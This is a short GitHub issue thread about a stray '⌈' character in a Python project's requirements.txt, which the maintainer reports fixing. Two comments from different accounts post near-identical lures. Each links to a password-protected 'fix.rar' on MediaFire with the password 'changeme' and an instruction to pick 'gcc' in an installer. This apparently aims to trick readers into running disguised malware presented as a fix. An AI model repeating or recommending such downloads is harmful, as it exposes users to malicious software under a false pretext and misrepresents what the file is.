### ISSUE TITLE
requirements.txt Unknown Character

### ISSUE THREAD

**Issue by fly800** [gordtulloch/mlCloudDetect#3]
In requirements.txt file, there is a unknown character. " ⌈ "

astropy
keras
numpy
pillow
pysolar
### requests⌈
scikit-image
scipy
tensorflow
matplotlib
### opencv-python⌈

After removing it from my system, they all loaded.

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by gordtulloch** [comment]
Merged new version without the issues
